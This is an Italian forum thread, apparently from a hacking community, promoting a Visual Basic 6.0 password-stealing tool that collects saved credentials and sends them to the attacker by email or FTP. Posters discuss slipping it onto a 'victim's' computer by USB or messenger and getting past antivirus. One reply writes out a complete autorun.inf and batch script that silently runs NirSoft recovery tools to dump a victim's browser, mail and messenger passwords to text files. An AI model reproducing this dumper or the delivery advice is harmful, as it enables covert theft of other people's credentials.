• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Release Ruba password in Visual Basic 6.0

Riferimento: Ruba password in Visual Basic 6.0

I tool della NirSofer sono rilevati anche da Clam Antivirus...fai pena.
 
Riferimento: Ruba password in Visual Basic 6.0

Ho due domande da farvi
1)Qualcuno l'ha testato???
2)Come faccio a inviare il programma al pc della vittima???
per inviarlo usa un chiavetta o ivialo tramite messenger
 
Riferimento: Ruba password in Visual Basic 6.0

Vi spiego io cosa fa è un semplice grabber in base ai tool che ci sono nella cartella ie / msn ecct prende le password salvate sul computer e le invia al vostro indirizzo email o le carica sull'ftp ormai tutti questi programmi vengono segnalati da qualsiasi antivirus. Quindi funzionera se la vittima o disattiva l'antivirus o non lo ha lol
 
Riferimento: Ruba password in Visual Basic 6.0

Vi spiego io cosa fa è un semplice grabber in base ai tool che ci sono nella cartella ie / msn ecct prende le password salvate sul computer e le invia al vostro indirizzo email o le carica sull'ftp ormai tutti questi programmi vengono segnalati da qualsiasi antivirus. Quindi funzionera se la vittima o disattiva l'antivirus o non lo ha lol
infatti hai ragione metà degli antivirus li rilevano
Perfavore, Entra oppure Registrati per vedere i Link!

...pero solo metà
 
Ultima modifica da un moderatore:
Riferimento: Ruba password in Visual Basic 6.0

è come il password grabber di Reatino xò già compilato con le source... Da testare...
 
Riferimento: Ruba password in Visual Basic 6.0

Ah ora ho capito come funziona... Scusami torzolo, una cosa molto più semplice di questa, che si fa anche in meno tempo è:
mettere in una chiavetta i programmi di recupero password della nirsoift, e due file di testo che andremmo a modificare così,
nel primo scrivere
[autorun]
open=launch.bat
e salvare come autorun.inf
nel secondo scrivere
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt (esempi di programmi della nirsoft)

e salvare come launch.bat

E poi ora mi è venuta un'altra domanda:
Se uno ha la possibilità di accedere al computer della ''vittima'' invece di inviare per email i file non li si può direttamente salvare sulla chiavetta??
 
Riferimento: Ruba password in Visual Basic 6.0

L'ho scaricato e inserito la mail. Rischio qualcosa? :S
 
Riferimento: Ruba password in Visual Basic 6.0

Ottimo lavor ti sei impegnato molto vedo comunque mi serviva è una specie di keylogger remoto meno complesso. Bel lavoro! :soso:
 
Riferimento: Ruba password in Visual Basic 6.0

Uno in pratica deve fare tutta sta cosa delle condizioni d'uso e della mail nel computer di un altro??
Se uno volesse rubare delle password ci deve mettere poco tempo ù.ù
 
Riferimento: Ruba password in Visual Basic 6.0

Uno in pratica deve fare tutta sta cosa delle condizioni d'uso e della mail nel computer di un altro??
Se uno volesse rubare delle password ci deve mettere poco tempo ù.ù
Ti crei il server.bat NEL TUO PC con l'eseguibile ruba pass e il server lo copi (insieme alla cartella utility) nel pc della vittima lui avviandolo fa in modo che le sue password siano tue : alcuni antivirus segnalano il programma (server.bat) e/o la cartella utility come spy/virus/trojan
p.s.
nella prossima release aggiungo la possibilità di salvare le pass nella chiavetta

L'ho scaricato e inserito la mail. Rischio qualcosa? :S
molti l'hanno testato. fai quello che vuoi...

Ottimo lavor ti sei impegnato molto vedo comunque mi serviva è una specie di keylogger remoto meno complesso. Bel lavoro! :soso:
grazie
 
Ultima modifica da un moderatore:
Riferimento: Ruba password in Visual Basic 6.0

aaaaaah ora ho capito :facepalm: ke idiot che sono
 
Riferimento: Ruba password in Visual Basic 6.0

Grazie quanto sei gentile.... xD